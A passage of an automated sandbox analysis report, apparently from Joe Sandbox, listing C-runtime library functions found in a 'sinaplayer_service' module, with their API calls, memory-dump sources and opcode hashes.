                                                                                                                                                                                                    • Opcode ID: 31000dac833d3b78a40c84d2fefd28055e4657f74eb2506a1ee3b461a4042ef0
                                                                                                                                                                                                    • Instruction ID: 7f72badf3b3c1ad69ecc5957bdda8063395aea28df76c1288b21361e2da0f9d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31000dac833d3b78a40c84d2fefd28055e4657f74eb2506a1ee3b461a4042ef0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BC15376954205BFFB20CFA9CC81FAE7BE8AF09744F154165FA04FB282E670D94187A1
                                                                                                                                                                                                    Function 6D14AF0A Relevance: 18.3, APIs: 12, Instructions: 293COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6D14AF2F
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,00000001,?,?,6D14B3BE,?,?,?,?,00000004,?,00000002,?,?,6D14B606), ref: 6D14AF49
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6D14AF78
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: fesetexceptflag.MSVCR120(00000004,0000001F,?,?,?,?,6D14F227,00000004), ref: 6D13FFFD
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: _errno.MSVCR120(?,?,?,6D14F227,00000004), ref: 6D140009
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6D14AFD0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale$__fperrraise_errno_fdtestfesetexceptflag
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3384718034-0
                                                                                                                                                                                                    • Opcode ID: 4f770931aaf601be7162a815a6d792fd8a5d9dd6cccd1ae6719cc9abaf0004b2
                                                                                                                                                                                                    • Instruction ID: d61f49cf3dd5c67eb3e4616ac00ea1d3533220913820f26cf4f66c0402281783
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f770931aaf601be7162a815a6d792fd8a5d9dd6cccd1ae6719cc9abaf0004b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4914DB160420AEFCF01AF50DA846FE7BB4FF41750F52C599EAA167088E7B49671CB44
                                                                                                                                                                                                    Function 6D14A762 Relevance: 18.3, APIs: 12, Instructions: 284COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D14A787
                                                                                                                                                                                                    • _dtest.MSVCR120(?,?,00000001,?,?,?,?,6D14AB9A,?,?,?,00000004,?,00000002), ref: 6D14A7A1
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6D14A7D0
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: fesetexceptflag.MSVCR120(00000004,0000001F,?,?,?,?,6D14F227,00000004), ref: 6D13FFFD
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: _errno.MSVCR120(?,?,?,6D14F227,00000004), ref: 6D140009
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D14A828
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale$__fperrraise_dtest_errnofesetexceptflag
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3316142991-0
                                                                                                                                                                                                    • Opcode ID: cad16edad36d0fc606f4dcf867887932e1fc9365d1976fa2340737c16e530515
                                                                                                                                                                                                    • Instruction ID: 62df84288af212fde0b8707ec8a54b36c0aadc4840c5605a40be1cede6713135
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cad16edad36d0fc606f4dcf867887932e1fc9365d1976fa2340737c16e530515
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C914675604A0FE6CF01AF50D980AFE77B8FF45358F23C4A9EAD196088EFB585698740
                                                                                                                                                                                                    Function 6D0979B3 Relevance: 18.3, APIs: 12, Instructions: 255stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strncnt.LIBCMT(?,005C2D90,?,7FFFFFFF,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90), ref: 6D0979EB
                                                                                                                                                                                                    • strncnt.LIBCMT(?,?,?,7FFFFFFF,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90), ref: 6D097A04
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,005C2D90,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097A38
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,005C2D90,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097AA2
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097ABB
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097B2C
                                                                                                                                                                                                    • __crtCompareStringEx.MSVCR120(?,?,00000000,?,00000000,?,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097B46
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90,?, *\,005C2D90,005C2A20), ref: 6D097B52
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90,?, *\,005C2D90,005C2A20), ref: 6D097B59
                                                                                                                                                                                                    • malloc.MSVCR120(?,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90,?, *\,005C2D90,005C2A20), ref: 6D0DFB80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$_freea_sstrncnt$CompareString__crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 934863277-0
                                                                                                                                                                                                    • Opcode ID: 54f3471a649b1ccb52b4cad68a695a1fe0f135a99d436f5f46326dbf5cadb7fd
                                                                                                                                                                                                    • Instruction ID: 345ebd876713b337731541932f61d942994bfbd3538d9cb613b616d130d48540
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54f3471a649b1ccb52b4cad68a695a1fe0f135a99d436f5f46326dbf5cadb7fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8981B8B2E042569FFF158F68C890BFE7BF9EF89324F518156E914AB240D7319C019761
                                                                                                                                                                                                    Function 6D10BCA6 Relevance: 18.3, APIs: 12, Instructions: 253stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strncat_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1948258708-0
                                                                                                                                                                                                    • Opcode ID: e51706c755dd3bcdc8b3bcb7b75625f862735d44e085a963a7ae6cbf63f62664
                                                                                                                                                                                                    • Instruction ID: 7a1db547cda943201f49632d807dcf5eb368483f7b88b7ed416c112c59c26368
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51706c755dd3bcdc8b3bcb7b75625f862735d44e085a963a7ae6cbf63f62664
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED810A31A482478FCB05EF68C6906BEB7B5FF55358B10455AFB609B248DFB1C841CBA2
                                                                                                                                                                                                    Function 6D0B3B20 Relevance: 18.1, APIs: 12, Instructions: 102COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 6D0B3B52
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D0B3B6C
                                                                                                                                                                                                    • towupper.MSVCR120(0000003D), ref: 6D0B3B9C
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(?,?), ref: 6D0B3BB8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0B3BEC
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D4759
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4761
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D476C
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002), ref: 6D0D477C
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000001,00000000), ref: 6D0D47A4
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D47B2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$EnvironmentErrorLastVariable__doserrno__dosmaperr_calloc_crt_errno_invalid_parameter_noinfotowupper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3078873410-0
                                                                                                                                                                                                    • Opcode ID: 015048aa12ab133d8d7578bb9c6bbd50402fb30560d7f4facb33de63964da8ff
                                                                                                                                                                                                    • Instruction ID: 10f9aa293754209c7f0fd02256693699e9b4bc376a23e0f7324ffa424b24b8c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 015048aa12ab133d8d7578bb9c6bbd50402fb30560d7f4facb33de63964da8ff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F631B23564C219ABFB119FA8D848FBE73B8EF0A710F204556E614DB184EB76D5408FA0
                                                                                                                                                                                                    Function 6D091A8D Relevance: 18.1, APIs: 12, Instructions: 99COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D091AF9
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D091B25
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D091B66
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ABE5A
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C5E
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C6C
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C7A
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C88
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C96
                                                                                                                                                                                                    • free.MSVCR120(?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3CA4
                                                                                                                                                                                                    • free.MSVCR120(6D091900,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D0D3CB2
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D0D3CCA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_lock$CriticalEnterSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4014792109-0
                                                                                                                                                                                                    • Opcode ID: 901dadbec4a4e95aa6b8f84db571e07b00fa1fc030ca6b54163b5d29321cc00b
                                                                                                                                                                                                    • Instruction ID: 36fceea8404ce75a4b4fc4139753f6c7240797948fbc5a0554a616bef49f80f2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901dadbec4a4e95aa6b8f84db571e07b00fa1fc030ca6b54163b5d29321cc00b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74310431A19702DFFB214B24C90272E73F57F02B69F11791EE2611F8D09B76A881EA46
                                                                                                                                                                                                    Function 6D0FDBCF Relevance: 18.1, APIs: 12, Instructions: 98fileCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?), ref: 6D0FDBF1
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?), ref: 6D0FDBFC
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6D0FDC1F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FDC29
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDC45
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDC52
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDC5F
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDC84
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: FileTimeToSystemTime.KERNEL32(6D0FDB61,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD540
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD554
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDC96
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDCA8
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FDCDC
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FDCF1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time_errno$___time64_t_from_ft$FileSystem$ErrorFindLastLocalNextSpecific_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2524732462-0
                                                                                                                                                                                                    • Opcode ID: 5473e3302c8774b5a0d92729503f99591f1bb8ef161e5e4b21afb29507ec58c8
                                                                                                                                                                                                    • Instruction ID: b5c11b719e470c61298e2d90eddb4780f4a76fe81f882fcd616a89c263e8d8e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5473e3302c8774b5a0d92729503f99591f1bb8ef161e5e4b21afb29507ec58c8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E31E7729006068FEB20DF64CC447AEB3F8EF85714F10465AD915C7280DBB4E585CFA1
                                                                                                                                                                                                    Function 6D0FDE1E Relevance: 18.1, APIs: 12, Instructions: 90fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0FDE3D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0FDE48
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?), ref: 6D0FDE6B
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FDE75
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDE91
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDE9E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDEAB
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDED0
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: FileTimeToSystemTime.KERNEL32(6D0FDB61,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD540
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD554
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDEE2
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDEF4
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FDF18
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FDF2F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time_errno$___time64_t_from_ft$FileSystem$ErrorFindLastLocalNextSpecific_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2524732462-0
                                                                                                                                                                                                    • Opcode ID: fe5aa39dfbd49c9c9659161ed2391e0fed9def77aa0bf0acd61b47dbd9e54187
                                                                                                                                                                                                    • Instruction ID: d14d1f2dda5c7472a3481519f1a7dae10204bc85241e219f63d0ea2ac8a9af39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe5aa39dfbd49c9c9659161ed2391e0fed9def77aa0bf0acd61b47dbd9e54187
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E31F5719006098BEB20EF74CC447AEB7F8EF95714F204A5AE925C7180EB78D5848FA1
                                                                                                                                                                                                    Function 6D0FD98D Relevance: 18.1, APIs: 12, Instructions: 87fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0FD9AC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0FD9B7
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?), ref: 6D0FD9DA
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FD9E4
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDA00
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDA0D
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDA1A
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDA3F
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1CC
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1E0
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: ___loctotime32_t.LIBCMT ref: 6D0FD20A
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDA4E
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDA5D
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FDA7E
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FDA95
                                                                                                                                                                                                    Memory Dump Source
